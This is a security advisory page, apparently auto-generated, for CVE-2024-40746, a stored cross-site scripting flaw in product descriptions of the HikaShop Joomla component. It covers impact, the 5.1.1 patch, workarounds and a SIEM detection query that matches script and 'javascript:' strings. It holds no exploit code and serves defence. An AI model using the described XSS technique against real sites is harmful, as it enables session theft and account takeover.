CVE-2024-40746 – A stored cross-site scripting vulnerability in ... (How to Fix)

📋 TL;DR

A stored cross-site scripting vulnerability in HikaShop Joomla Component allows attackers to inject malicious JavaScript into product descriptions. When users view affected products, the malicious code executes in their browsers. This affects all Joomla sites running vulnerable versions of HikaShop.

💻 Affected Systems

Products:

HikaShop Joomla Component

Versions: All versions < 5.1.1

Operating Systems: All operating systems running Joomla

Default Config Vulnerable: ⚠️ Yes

Notes: Affects all Joomla installations using HikaShop with vulnerable versions. The vulnerability exists in the product description field handling.

📦 What is this software?

Hikashop by Hikashop

View all CVEs affecting Hikashop →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal admin session cookies, perform account takeover, deface websites, or redirect users to malicious sites, potentially leading to complete site compromise.

🟠

Likely Case

Attackers inject malicious scripts to steal user session cookies, perform actions as authenticated users, or display phishing content to visitors.

🟢

If Mitigated

With proper input validation and output encoding, the malicious payload would be rendered harmless as text rather than executable code.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires ability to create or edit products (typically admin or editor access). The vulnerability is straightforward to exploit once authenticated.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 5.1.1

Vendor Advisory: https://www.hikashop.com/

Restart Required: No

Instructions:

1. Log into Joomla admin panel
2. Navigate to Extensions > Manage > Update
3. Update HikaShop to version 5.1.1 or later
4. Verify update completed successfully

🔧 Temporary Workarounds

Input Sanitization Filter

all

Implement custom input filtering for product description fields to strip or encode HTML/JavaScript

Content Security Policy

all

Implement strict CSP headers to prevent execution of inline JavaScript

🧯 If You Can't Patch

Restrict product editing permissions to trusted administrators only
Implement web application firewall rules to block XSS payloads in product descriptions

🔍 How to Verify

Check if Vulnerable:

Check HikaShop version in Joomla admin panel under Components > HikaShop > About

Check Version:

Check Joomla admin panel: Components > HikaShop > About

Verify Fix Applied:

Verify HikaShop version is 5.1.1 or higher and test product description field with XSS payloads

📡 Detection & Monitoring

Log Indicators:

Unusual product edits, especially with JavaScript or HTML tags in descriptions
Multiple failed XSS attempts in web server logs

Network Indicators:

HTTP requests containing JavaScript payloads in product description parameters

SIEM Query:

web_requests WHERE url_parameters CONTAINS '<script' OR url_parameters CONTAINS 'javascript:' AND url_path CONTAINS 'hikashop'

📊 Metadata

CVE ID: CVE-2024-40746

CVSS v3 Score: 5.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

Published: October 21, 2024

Last Updated: March 19, 2025

🔗 References

https://www.hikashop.com/ Product

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-40746, you might also want to check these: